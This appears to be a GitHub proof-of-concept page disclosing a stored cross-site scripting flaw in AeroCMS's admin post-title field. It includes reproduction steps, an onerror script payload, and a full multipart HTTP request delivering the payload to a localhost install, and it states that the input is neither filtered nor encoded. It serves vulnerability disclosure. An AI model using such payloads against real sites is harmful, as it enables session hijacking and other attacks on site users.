Skip to content

D4rkP0w4r/AeroCMS-Add_Posts-Stored_XSS-Poc

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 

AeroCMS-Add_Posts-Stored_XSS-Poc

  • Description => Stored_XSS at Post Title

Step to Reproduct

  • Login to admin panel -> Posts -> Add Posts -> Post Title -> inject payload <img/src/onerror=prompt(10)> -> The XSS will trigger when clicked Edit Post button

Exploit

image image

Vulnerable Code

  • add_post.php image When inserting into the database, the input is not filtered out of html characters
  • post.php image Even when displaying, the entity cannot be properly encoded

POC

  • Injection Point
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_title"

<img/src/onerror=prompt(10)>
  • Request
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------85448121341942511952219062291
Content-Length: 1101
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26
Cookie: Phpstorm-6b6ba5ee=79a50460-3b02-4cde-a5a4-ff6883c16a7b; PHPSESSID=ndh6ks953tmha1ps8cfp4bplf2
Upgrade-Insecure-Requests: 1

-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_title"

<img/src/onerror=prompt(10)>
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_category_id"

1
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_user"

admin
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_status"

published
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_tags"

1
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_content"

<p>111</p>
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="update_post"

Edit Post
-----------------------------85448121341942511952219062291--

POC VIDEO https://drive.google.com/file/d/1kMGPBLKgefvKZj34QxDlPTxXdcT0kRR_/view?usp=sharing

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published